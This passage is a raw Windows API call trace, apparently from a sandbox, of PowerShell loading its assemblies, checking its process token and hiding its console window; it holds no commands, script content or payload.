GetLastError () returned 0x57 [0050.788] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14e8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0050.788] GetLastError () returned 0x2 [0050.788] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14e8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0050.788] GetLastError () returned 0x2 [0050.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14e8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0050.906] GetLastError () returned 0x2 [0050.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14e8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0050.906] GetLastError () returned 0x2 [0050.941] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.941] GetLastError () returned 0xcb [0050.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e9b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0050.942] GetLastError () returned 0xcb [0050.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e968, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0050.942] GetLastError () returned 0xcb [0050.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e968, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0050.942] GetLastError () returned 0xcb [0051.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e968, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.011] GetLastError () returned 0xcb [0051.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x14e8fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0051.061] GetLastError () returned 0x2 [0051.061] SetErrorMode (uMode=0x1) returned 0x1 [0051.061] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x14eda4 | out: lpFileInformation=0x14eda4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0051.062] GetLastError () returned 0x2 [0051.062] SetErrorMode (uMode=0x1) returned 0x1 [0051.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e9b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.224] GetLastError () returned 0x0 [0051.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e968, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.224] GetLastError () returned 0x0 [0051.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e968, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.225] GetLastError () returned 0x0 [0051.227] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.227] GetLastError () returned 0xcb [0051.229] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.229] GetLastError () returned 0xcb [0051.229] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.229] GetLastError () returned 0xcb [0051.232] CoCreateGuid (in: pguid=0x14ee84 | out: pguid=0x14ee84*(Data1=0x7ca05c4b, Data2=0xed15, Data3=0x4e10, Data4=([0]=0xb9, [1]=0x66, [2]=0x53, [3]=0x13, [4]=0xfa, [5]=0xa5, [6]=0x6a, [7]=0x36))) returned 0x0 [0051.235] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.235] GetLastError () returned 0xcb [0051.237] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.237] GetLastError () returned 0xcb [0051.239] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.239] GetLastError () returned 0xcb [0051.244] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0051.244] GetLastError () returned 0x0 [0051.245] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x14ed64 | out: lpConsoleScreenBufferInfo=0x14ed64) returned 1 [0051.246] GetLastError () returned 0x0 [0051.248] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0051.248] GetLastError () returned 0x0 [0051.248] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x14ed64 | out: lpConsoleScreenBufferInfo=0x14ed64) returned 1 [0051.248] GetLastError () returned 0x0 [0051.249] GetVersionExW (in: lpVersionInformation=0x3175d8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3175d8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0051.249] GetLastError () returned 0x0 [0051.250] GetCurrentProcess () returned 0xffffffff [0051.250] GetLastError () returned 0x3f0 [0051.251] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x14ed74 | out: TokenHandle=0x14ed74*=0x31c) returned 1 [0051.251] GetLastError () returned 0x3f0 [0051.255] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14edcc | out: TokenInformation=0x0, ReturnLength=0x14edcc) returned 0 [0051.255] GetLastError () returned 0x7a [0051.256] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2e3d30 [0051.256] GetLastError () returned 0x7a [0051.256] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x2e3d30, TokenInformationLength=0x4, ReturnLength=0x14edcc | out: TokenInformation=0x2e3d30, ReturnLength=0x14edcc) returned 1 [0051.256] GetLastError () returned 0x7a [0051.257] DuplicateTokenEx (in: hExistingToken=0x31c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x14ed84 | out: phNewToken=0x14ed84*=0x314) returned 1 [0051.257] GetLastError () returned 0x7f [0051.257] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14edcc | out: TokenInformation=0x0, ReturnLength=0x14edcc) returned 0 [0051.257] GetLastError () returned 0x7a [0051.257] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2e3cb0 [0051.257] GetLastError () returned 0x7a [0051.258] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x2e3cb0, TokenInformationLength=0x4, ReturnLength=0x14edcc | out: TokenInformation=0x2e3cb0, ReturnLength=0x14edcc) returned 1 [0051.258] GetLastError () returned 0x7a [0051.258] CheckTokenMembership (in: TokenHandle=0x314, SidToCheck=0x1fc29a8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x14ed60 | out: IsMember=0x14ed60) returned 1 [0051.258] GetLastError () returned 0x7a [0051.258] CloseHandle (hObject=0x314) returned 1 [0051.258] GetLastError () returned 0x7a [0051.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.258] GetLastError () returned 0x7a [0051.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e854, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.258] GetLastError () returned 0x7a [0051.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e854, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.258] GetLastError () returned 0x7a [0051.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e854, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.259] GetLastError () returned 0x7a [0051.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.277] GetLastError () returned 0x7a [0051.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e854, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.277] GetLastError () returned 0x7a [0051.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e854, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.277] GetLastError () returned 0x7a [0051.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.278] GetLastError () returned 0x7a [0051.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e854, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.278] GetLastError () returned 0x7a [0051.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e854, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.278] GetLastError () returned 0x7a [0051.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.278] GetLastError () returned 0x7a [0051.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e868, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.278] GetLastError () returned 0x7a [0051.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e868, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.278] GetLastError () returned 0x7a [0051.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e868, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.278] GetLastError () returned 0x7a [0051.321] SetConsoleCtrlHandler (HandlerRoutine=0x1c8384a, Add=1) returned 1 [0051.321] GetLastError () returned 0x7a [0051.362] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.362] GetLastError () returned 0xcb [0051.363] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.363] GetLastError () returned 0xcb [0051.680] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.680] GetLastError () returned 0xcb [0051.880] GetConsoleWindow () returned 0x301e4 [0051.881] ShowWindow (hWnd=0x301e4, nCmdShow=0) returned 0 [0051.899] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x314 [0051.899] GetLastError () returned 0x0 [0051.900] CoCreateGuid (in: pguid=0x14ed98 | out: pguid=0x14ed98*(Data1=0xb7dddb26, Data2=0x1245, Data3=0x4693, Data4=([0]=0x8d, [1]=0x9f, [2]=0x26, [3]=0x8d, [4]=0x66, [5]=0x67, [6]=0x42, [7]=0xc5))) returned 0x0 [0051.987] WinSqmIsOptedIn () returned 0x0 [0051.987] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.987] GetLastError () returned 0xcb [0051.990] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.990] GetLastError () returned 0xcb [0051.990] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.990] GetLastError () returned 0xcb [0051.991] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.991] GetLastError () returned 0xcb [0051.991] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.991] GetLastError () returned 0xcb [0051.995] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.995] GetLastError () returned 0xcb [0051.995] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.995] GetLastError () returned 0xcb [0051.995] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.995] GetLastError () returned 0xcb [0051.997] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.997] GetLastError () returned 0xcb [0052.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.001] GetLastError () returned 0xcb [0052.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.001] GetLastError () returned 0xcb [0052.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.001] GetLastError () returned 0xcb [0052.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.001] GetLastError () returned 0xcb [0052.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.049] GetLastError () returned 0x3 [0052.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.049] GetLastError () returned 0x3 [0052.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.049] GetLastError () returned 0x3 [0052.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.049] GetLastError () returned 0x3 [0052.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.049] GetLastError () returned 0x3 [0052.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.050] GetLastError () returned 0x3 [0052.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.050] GetLastError () returned 0x3 [0052.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.050] GetLastError () returned 0x3 [0052.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 